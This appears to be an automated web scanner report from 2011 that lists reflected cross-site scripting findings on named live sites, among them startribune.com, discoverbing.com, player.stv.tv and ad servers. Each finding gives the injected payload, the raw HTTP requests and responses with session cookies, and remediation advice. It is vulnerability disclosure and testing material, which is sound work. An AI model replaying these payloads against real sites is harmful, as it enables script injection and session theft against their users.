The value of the startingZoom request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e9e0"><script>alert(1)</script>352e8afc084 was submitted in the startingZoom parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /smgmap-static.htm?accountId=lewisautos&startingZoom=129e9e0"><script>alert(1)</script>352e8afc084&locale=en_US HTTP/1.1
Host: googlev8.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.volkswagensouthburlington.com/used/Volkswagen/2010-Volkswagen-Jetta+Sportwagen-56dc6e350a0a006500315e084179d2fb.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse,CookieSet
Vary: Accept-Encoding
Date: Sat, 23 Apr 2011 15:53:44 GMT
Connection: close
Set-Cookie: ssoid=831111d60a0a00ed0170c7a3d9b58ea7;path=/;domain=.dealer.com
Set-Cookie: ddcpoolid=CmsPoolGoogleV8;path=/;
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 433
The value of the v request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 1a9d6%3balert(1)//aee147c7321 was submitted in the v parameter. This input was echoed as 1a9d6;alert(1)//aee147c7321 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the cnd request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d0257'-alert(1)-'1d65a39e68a was submitted in the cnd parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ab?enc=MzMzMzMzA0BI4XoUrkcBQAAAAAAAAABASOF6FK5HAUAzMzMzMzMDQPUMgmY50zQASsYda6b2ziULkbNNAAAAAK7tAADLAQAAGgEAAAIAAACD3QQAhWQAAAEAAABVU0QAVVNEANgCWgAZFokDsg4BAgUCAAQAAAAAWBt0FgAAAAA.&tt_code=vert-15&udj=uf%28%27a%27%2C+2317%2C+1303613744%29%3Buf%28%27c%27%2C+63793%2C+1303613744%29%3Buf%28%27r%27%2C+318851%2C+1303613744%29%3B&cnd=!1BNlHQix8gMQg7sTGAAghckBKIkHMTQzMzMzMwNAQhMIABAAGAAgASj-__________8BSABQAFiZLGAAaJoCd0257'-alert(1)-'1d65a39e68a&referrer=http://www2.wspa.com/news/2011/apr/22/computer-hackers-strike-more-often-2011-ar-1751321/&pp=9FD4EC90B5C5CE8F HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www2.wspa.com/news/2011/apr/22/computer-hackers-strike-more-often-2011-ar-1751321/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIm4sBEAoYASABKAEwhY7L7QQQhY7L7QQYAA..; sess=1; uuid2=2724386019227846218; anj=Kfu=8fG5EfErkX00s]#%2L_'x%SEV/i#-BS4FSlRQHqgV=Rr7(Xk4Qqsf:-MV!ucpO8MvVo804<ws1H^P9BKUe`h-Uw1UV1'!F+iwGt=a'0z[`+B!OOclfZN%p1anmQi))(EM:>@>kRSP_qN]`FJCe#'.gAbjII9rT^:Vp?%xJEuJ_xgcc?/x+()3bsr'Cdow<veb?3Uv/UVYw=)_4D2ZjV3rbT=:l8]3^OkGzA6-ss1ro'nQbiB4iL#@WoF8*q+%8Ck(Z3co?dyLQh0@6TKK-*L:%LQc0KPP-c*78]Jv/eZc3uvQC6q``1N6p(m049Jmn`V9t>QhMj!HjDo5]s)G-(O-%mSwdj6E*mM.>wnu4RgaTx8L85eBy@1cmd#TjMSFHhH?CKGG).w$E$fK=+G=8CNE:N(LZ6vB3bbu>7P!U1PE:+FT-:Y@6U@6u@Qh
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Mon, 25-Apr-2011 03:13:50 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sat, 23-Jul-2011 03:13:50 GMT; domain=.adnxs.com; HttpOnly Content-Type: text/javascript Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sat, 23-Jul-2011 03:13:50 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: anj=Kfu=8fG7]PErkX00s]#%2L_'x%SEV/i#+hC4FSlRQHqgV=Rr7(Xk4Qqsf:-MV!ucpO8MvVo804<ws1H^P9BKUe`h-Uw1UV1'!F+iwGt=a'0z[`+B!OOclfZN%p1anmQi))(EM:>@>kRSP_qN]`FJCe#'.gAbjII9rT^:Vp?%xJEuJ_xgcc?/x+()3bsr'Cdow<veb?3Uv/UVYw=)_4D2ZjV3rbT=:l8]3^OkGzA6-ss1ro'nQbiB4iL#@WoF8*q+%8Ck(Z3co?dyLQh0@6TKK-*L:%LQc0KPOtwh*#Idf1b-0mblYuW#YoWapds8JCvl*MM4t<v#RguUj2DKDc_kw579.tS]!Buu*UhVOvuR!wc1Mto<c]C_i%cwI56_oaKuURO+jVQ]>x9ZA3%-+ha%WWdt(<CYrwlBy9*)'tz)U.+wC'cEc9uMFNt9os87@P@(EU[>Fu<>XZ<4; path=/; expires=Sat, 23-Jul-2011 03:13:50 GMT; domain=.adnxs.com; HttpOnly Date: Sun, 24 Apr 2011 03:13:50 GMT Content-Length: 5240
The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload 11db5<script>alert(1)</script>30c2ff40425 was submitted in the csid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /gateway/gw.js?csid=H1097211db5<script>alert(1)</script>30c2ff40425 HTTP/1.1 Host: js.revsci.net Proxy-Connection: keep-alive Referer: http://www.startribune.com/business/120319724.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the Q request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c20c0"style%3d"x%3aexpression(alert(1))"edf8f6f1e85 was submitted in the Q parameter. This input was echoed as c20c0"style="x:expression(alert(1))"edf8f6f1e85 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The value of the REDIRURL request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17897"style%3d"x%3aexpression(alert(1))"a2cf0c13c07 was submitted in the REDIRURL parameter. This input was echoed as 17897"style="x:expression(alert(1))"a2cf0c13c07 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7eb3c<img%20src%3da%20onerror%3dalert(1)>701dbe90b3c was submitted in the REST URL parameter 1. This input was echoed as 7eb3c<img src=a onerror=alert(1)>701dbe90b3c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /favicon.ico7eb3c<img%20src%3da%20onerror%3dalert(1)>701dbe90b3c HTTP/1.1 Host: player.stv.tv Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=2276b588%2D65fd%2D480a%2Dbd7a%2D45e2d0af8043; CFTOKEN=0; __utmz=187638121.1303604918.1.1.utmcsr=reddit.com|utmccn=(referral)|utmcmd=referral|utmcct=/search; __utma=187638121.766996194.1303604918.1303604918.1303604918.1; __utmc=187638121; __utmb=187638121.1.10.1303604918; __utmz=1.1303604918.1.1.utmcsr=reddit.com|utmccn=(referral)|utmcmd=referral|utmcct=/search; __utma=1.1014340304.1303604918.1303604918.1303604918.1; __utmc=1; __utmb=187638121.2.10.1303604918
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a666c<img%20src%3da%20onerror%3dalert(1)>37a13038884 was submitted in the REST URL parameter 1. This input was echoed as a666c<img src=a onerror=alert(1)>37a13038884 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /searcha666c<img%20src%3da%20onerror%3dalert(1)>37a13038884/%22%3E%3Cmarquee%3E%3Ch1%3EXSS/ HTTP/1.1 Host: player.stv.tv Proxy-Connection: keep-alive Referer: http://www.reddit.com/search?q=xss User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca4c4"><img%20src%3da%20onerror%3dalert(1)>f4d47744512 was submitted in the REST URL parameter 2. This input was echoed as ca4c4"><img src=a onerror=alert(1)>f4d47744512 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /search/ca4c4"><img%20src%3da%20onerror%3dalert(1)>f4d47744512/ HTTP/1.1 Host: player.stv.tv Proxy-Connection: keep-alive Referer: http://www.reddit.com/search?q=xss User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 2 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload e695f(a)c8488e7fd4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /search/%22%3E%3Cmarquee%3E%3Ch1%3EXSSe695f(a)c8488e7fd4/ HTTP/1.1 Host: player.stv.tv Proxy-Connection: keep-alive Referer: http://www.reddit.com/search?q=xss User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a6c29"%3bc10987591b3 was submitted in the REST URL parameter 2. This input was echoed as a6c29";c10987591b3 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /search/a6c29"%3bc10987591b3/ HTTP/1.1 Host: player.stv.tv Proxy-Connection: keep-alive Referer: http://www.reddit.com/search?q=xss User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the slotname request parameter is copied into the HTML document as plain text between tags. The payload 6899e<script>alert(1)</script>d4169fc9e6f was submitted in the slotname parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /gampad/ads?correlator=1303613695102&output=json_html&callback=GA_googleSetAdContentsBySlotForSync&impl=s&client=ca-pub-0640823897479847&slotname=86x40_Target_Nav_Ad6899e<script>alert(1)</script>d4169fc9e6f&page_slots=86x40_Target_Nav_Ad&cookie_enabled=1&url=http%3A%2F%2Fwww.startribune.com%2Fbusiness%2F120319724.html&lmt=1303631685&dt=1303613696772&cc=17&biw=956&bih=926&ifi=1&adk=2010173350&u_tz=-300&u_his=1&u_java=true&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&flash=10.2.154&gads=v2&ga_vid=669632137.1303613697&ga_sid=1303613697&ga_hid=1201002597 HTTP/1.1 Host: pubads.g.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.startribune.com/business/120319724.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; __utmz=251550727.1303423668.1.1.utmcsr=mgid.com|utmccn=(referral)|utmcmd=referral|utmcct=/ban/home_300_top.html; __utma=251550727.399576100.1303423668.1303423668.1303423668.1
Response
HTTP/1.1 200 OK P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/javascript; charset=UTF-8 X-Content-Type-Options: nosniff Date: Sun, 24 Apr 2011 03:13:24 GMT Server: gfp-be Cache-Control: private, x-gzip-ok="" X-XSS-Protection: 1; mode=block Content-Length: 2732
GA_googleSetAdContentsBySlotForSync({"86x40_Target_Nav_Ad6899e<script>alert(1)</script>d4169fc9e6f":{"_type_":"html","_expandable_":false,"_html_":"\x3c!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01//EN\"\"http://www.w3.org/TR/html4/strict.dtd\"\x3e\x3chtml\x3e\x3chead\x3e\x3cstyle\x3ea:link{color:#f ...[SNIP]...
The value of the d request parameter is copied into a JavaScript inline comment. The payload 6c877*/alert(1)//a9785d1590b was submitted in the d parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: TRP Apache-Coyote/1.1 Last-Modified: Sun, 24 Apr 2011 03:14:33 GMT p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Content-Type: text/javascript;charset=UTF-8 Cache-Control: private, max-age=3600 Expires: Sun, 24 Apr 2011 04:14:33 GMT Date: Sun, 24 Apr 2011 03:14:33 GMT Connection: close Vary: Accept-Encoding Content-Length: 17455
/*! Copyright 2009,2010 the Rubicon Project. All Rights Reserved. No permission is granted to use, copy or extend this code */
/* The requested resource (/oz/scripts/domains/startribune.com6c877*/alert(1)//a9785d1590b/page_parser_hooks.js) is not available */
function oz_trim(A){return A.replace(/^\s+|\s+$/g,"");}function PageParser(){this.timeout=2000;this.doc=document;this.stopwords=null;this.init=function( ...[SNIP]...
The value of the url request parameter is copied into the HTML document as plain text between tags. The payload f0c49<script>alert(1)</script>5947e1fafc3 was submitted in the url parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /buttons/count?url=file%3A///C%3A/cdn/2011/04/23/dork/reflected-xss-cross-site-scripting-cwe-79-capec-86-admin.testandtarget.omniture.com_443.htmf0c49<script>alert(1)</script>5947e1fafc3 HTTP/1.1 Host: widgets.digg.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the dart request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a7e18'%3balert(1)//ca877ea91 was submitted in the dart parameter. This input was echoed as a7e18';alert(1)//ca877ea91 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /dynamic/homes/tophomes_module.php?do=6&dart=http://adclick.g.doubleclick.net/aclk%3Fsa%3DL%26ai%3DBhqAYB5GzTZi3HtGHlAeZ5ZXECpH8g_EBAAAAEAEg4YW0CTgAWIGU--4PYMkGsgETd3d3LnN0YXJ0cmlidW5lLmNvbboBCjMwMHgyNTBfYXPIAQnaATJodHRwOi8vd3d3LnN0YXJ0cmlidW5lLmNvbS9idXNpbmVzcy8xMjAzMTk3MjQuaHRtbOABA8ACAuACAOoCElRvcF9TdGFja3NfMzAweDI5OfgC8NEekAOkA5gDpAOoAwHQBJBO4AQB%26num%3D0%26sig%3DAGiWqty0U21kPzJUR_so1JDAuqz2yhPd8Q%26client%3Dca-pub-0640823897479847%26adurl%3Da7e18'%3balert(1)//ca877ea91 HTTP/1.1 Host: ww2.startribune.com Proxy-Connection: keep-alive Referer: http://www.startribune.com/business/120319724.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: BBN2=3spZ6OLqOB1SoYyqTE5ehlGQyLTBTTtiQ_5CYiNLJoE4V6pwyO8LUrQ; rsi_segs=; __gads=ID=f03cfcd82208d24a:T=1303613694:S=ALNI_MZeapzxwp9OE5uXr0-WHOgVAHuqFg
document.write('<div style="width:300px;background-color:white"><!-- start top homes code --><img src="http://stmedia.startribune.com/designimages/tophomes0809.jpg" alt="Is this your next home ...[SNIP]... J0cmlidW5lLmNvbS9idXNpbmVzcy8xMjAzMTk3MjQuaHRtbOABA8ACAuACAOoCElRvcF9TdGFja3NfMzAweDI5OfgC8NEekAOkA5gDpAOoAwHQBJBO4AQB&num=0&sig=AGiWqty0U21kPzJUR_so1JDAuqz2yhPd8Q&client=ca-pub-0640823897479847&adurl=a7e18';alert(1)//ca877ea91http://homes.startribune.com/for-sale/listing/20-13003519"> ...[SNIP]...
2.45. http://ww2.startribune.com/dynamic/homes/tophomes_module.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ww2.startribune.com
Path: /dynamic/homes/tophomes_module.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cff00'%3balert(1)//5d2a8a1ca84 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as cff00';alert(1)//5d2a8a1ca84 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /dynamic/homes/tophomes_module.php?do=6&dart=http://adclick.g.doubleclick.net/aclk%3Fsa%3DL%26ai%3DBhqAYB5GzTZi3HtGHlAeZ5ZXECpH8g_EBAAAAEAEg4YW0CTgAWIGU--4PYMkGsgETd3d3LnN0YXJ0cmlidW5lLmNvbboBCjMwMHgyNTBfYXPIAQnaATJodHRwOi8vd3d3LnN0YXJ0cmlidW5lLmNvbS9idXNpbmVzcy8xMjAzMTk3MjQuaHRtbOABA8ACAuACAOoCElRvcF9TdGFja3NfMzAweDI5OfgC8NEekAOkA5gDpAOoAwHQBJBO4AQB%26num%3D0%26sig%3DAGiWqty0U21kPzJUR_so1JDAuqz2yhPd8Q%26client%3Dca-pub-0640823897479847%26adur/cff00'%3balert(1)//5d2a8a1ca84l%3D HTTP/1.1 Host: ww2.startribune.com Proxy-Connection: keep-alive Referer: http://www.startribune.com/business/120319724.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: BBN2=3spZ6OLqOB1SoYyqTE5ehlGQyLTBTTtiQ_5CYiNLJoE4V6pwyO8LUrQ; rsi_segs=; __gads=ID=f03cfcd82208d24a:T=1303613694:S=ALNI_MZeapzxwp9OE5uXr0-WHOgVAHuqFg
document.write('<div style="width:300px;background-color:white"><!-- start top homes code --><img src="http://stmedia.startribune.com/designimages/tophomes0809.jpg" alt="Is this your next home ...[SNIP]... XJ0cmlidW5lLmNvbS9idXNpbmVzcy8xMjAzMTk3MjQuaHRtbOABA8ACAuACAOoCElRvcF9TdGFja3NfMzAweDI5OfgC8NEekAOkA5gDpAOoAwHQBJBO4AQB&num=0&sig=AGiWqty0U21kPzJUR_so1JDAuqz2yhPd8Q&client=ca-pub-0640823897479847&adur/cff00';alert(1)//5d2a8a1ca84l=http://homes.startribune.com/for-sale/listing/1814-3985775"> ...[SNIP]...
2.46. http://www.discoverbing.com/Activities/BeEntertained [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.discoverbing.com
Path: /Activities/BeEntertained
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5945"><script>alert(1)</script>96d473a90ab was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Activities/BeEntertained?e5945"><script>alert(1)</script>96d473a90ab=1 HTTP/1.1 Host: www.discoverbing.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vnum=1306159250097%26vn%3D1; ASP.NET_SessionId=qf0g0pi5nac2fyresp0selyq; 081c924b-ddfd-447a-8c7a-2db01211cae7=%7B%22parent_id%22%3A%22%22%2C%22referrer%22%3A%22%22%2C%22id%22%3A%220J2F1ltJ97i%22%2C%22wom%22%3Afalse%2C%22entry_point%22%3A%22http%3A%2F%2Fwww.discoverbing.com%2Fmobile%2Findex.html%22%2C%22url_tag%22%3A%22NOMTAG%22%7D; s_cc=true; s_invisit=true; s_nr=1303569652387; s_sq=%5B%5BB%5D%5D
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> ...[SNIP]... <a id="global-nav-share-facebookshare" href="http://www.facebook.com/sharer.php?u=http://www.discoverbing.com/Activities/BeEntertained?e5945"><script>alert(1)</script>96d473a90ab=1&fbshare=true&t=Look+what+I+discovered+about+staying+entertained+with+Bing+on+DiscoverBing" target="_blank"> ...[SNIP]...
2.47. http://www.discoverbing.com/Activities/BeHealthy [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.discoverbing.com
Path: /Activities/BeHealthy
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d26e8"><script>alert(1)</script>f6b006dd9db was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Activities/BeHealthy?d26e8"><script>alert(1)</script>f6b006dd9db=1 HTTP/1.1 Host: www.discoverbing.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vnum=1306159250097%26vn%3D1; ASP.NET_SessionId=qf0g0pi5nac2fyresp0selyq; 081c924b-ddfd-447a-8c7a-2db01211cae7=%7B%22parent_id%22%3A%22%22%2C%22referrer%22%3A%22%22%2C%22id%22%3A%220J2F1ltJ97i%22%2C%22wom%22%3Afalse%2C%22entry_point%22%3A%22http%3A%2F%2Fwww.discoverbing.com%2Fmobile%2Findex.html%22%2C%22url_tag%22%3A%22NOMTAG%22%7D; s_cc=true; s_invisit=true; s_nr=1303569646617; s_sq=%5B%5BB%5D%5D
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> ...[SNIP]... <a id="global-nav-share-facebookshare" href="http://www.facebook.com/sharer.php?u=http://www.discoverbing.com/Activities/BeHealthy?d26e8"><script>alert(1)</script>f6b006dd9db=1&fbshare=true&t=Look+what+I+discovered+on+Bing" target="_blank"> ...[SNIP]...
2.48. http://www.discoverbing.com/Activities/BePrepared [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.discoverbing.com
Path: /Activities/BePrepared
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 30806"><script>alert(1)</script>02794a1d94 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
